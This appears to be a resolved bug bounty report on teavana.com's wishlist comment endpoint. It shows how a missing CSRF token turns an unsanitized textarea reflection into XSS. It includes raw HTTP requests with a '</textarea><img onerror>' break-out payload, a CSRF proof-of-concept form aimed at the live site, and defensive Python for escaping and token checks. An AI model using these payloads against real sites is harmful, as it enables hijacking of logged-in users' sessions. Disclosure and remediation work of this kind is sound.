Reflected XSS by exploiting CSRF vulnerability on teavana.com wishlist comment module. (wishlist-comments)

Medium
Starbucks
Reported by faisalahmed

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
Users can add comments on their wishlist items. The HTTP request that adds a comment to a wishlist item looks like this:

```http
POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1
Host: www.teavana.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.teavana.com/us/en/my-wishlist
Content-Length: 55
Cookie: REDACTED
Connection: close

wishlistComment=:comment_string
```

The value of `wishlistComment` is reflected in the returned HTML snippet as below:

```html
<textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12">
:comment_string
</textarea>
```

The returned string is not sanitized. As a result, if a user submits an HTML/JavaScript payload as the value, that payload is returned unchanged and causes JavaScript execution.

**Vulnerable POST**

```http
POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1
Host: www.teavana.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.teavana.com/us/en/my-wishlist
Content-Length: 55
Cookie: REDACTED
Connection: close

wishlistComment=</textarea><img+src=x+onerror=alert(1)>
```

**Response**

```html
<textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12">
</textarea><img src=x onerror=alert(1)>
</textarea>
```

There is no CSRF token tied to the comment-adding POST request.

As a result, this CSRF flaw turns what would otherwise be a self-XSS into a reflected XSS that works against any logged-in user.

**CSRF to XSS PoC**

```html
<html>
  <body>
    <form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id" method="POST">
      <input type="hidden" name="wishlistComment" value="&lt;&#47;textarea&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

Replace `:id` with your wishlist id (e.g. C1005285074). This will execute the JavaScript and pop up an alert box. {F129593}
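The two server-side controls whose absence the report describes, output escaping of the reflected comment and a per-session CSRF token on the comment POST, as an added Python example that is not code from the report or from the teavana.com site. The rendering functions, the session dict, the `csrf_token` field name and the constructed payload string are assumptions for illustration.

```python
import html
import hmac
import secrets

# Constructed input: the same break-out string the report's vulnerable POST sends,
# a closing tag followed by an element whose event handler fires on load failure.
REPORT_PAYLOAD = '</textarea><img src=x onerror=alert(1)>'


def render_textarea_vulnerable(comment: str) -> str:
    """Reflection as the report describes it: the comment is inserted verbatim."""
    return ('<textarea maxlength="150" id="wishlistComment" name="wishlistComment">'
            f'{comment}</textarea>')


def render_textarea_safe(comment: str) -> str:
    """Hardened reflection: escaping makes '</textarea>' and '<img' inert text."""
    return ('<textarea maxlength="150" id="wishlistComment" name="wishlistComment">'
            f'{html.escape(comment, quote=True)}</textarea>')


def breaks_out_of_textarea(snippet: str) -> bool:
    """True when the rendered snippet has more than its one intended closing tag."""
    return snippet.lower().count('</textarea>') != 1


def issue_csrf_token(session: dict) -> str:
    """Mint a random per-session token; the wishlist form echoes it in a hidden field."""
    session['csrf_token'] = secrets.token_hex(32)
    return session['csrf_token']


def handle_wishlist_comment(session: dict, form: dict) -> tuple:
    """Controller for the Wishlist-Comments POST with both controls applied.

    A cross-origin form like the report's PoC cannot read the victim's token,
    so the constant-time compare fails and the request is refused.
    """
    expected = session.get('csrf_token', '')
    supplied = str(form.get('csrf_token', ''))
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, 'missing or invalid CSRF token'
    return 200, render_textarea_safe(str(form.get('wishlistComment', '')))
```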

Report Details

Additional information and metadata

State: Closed

Substate: Resolved

Weakness: Cross-site Scripting (XSS) - Generic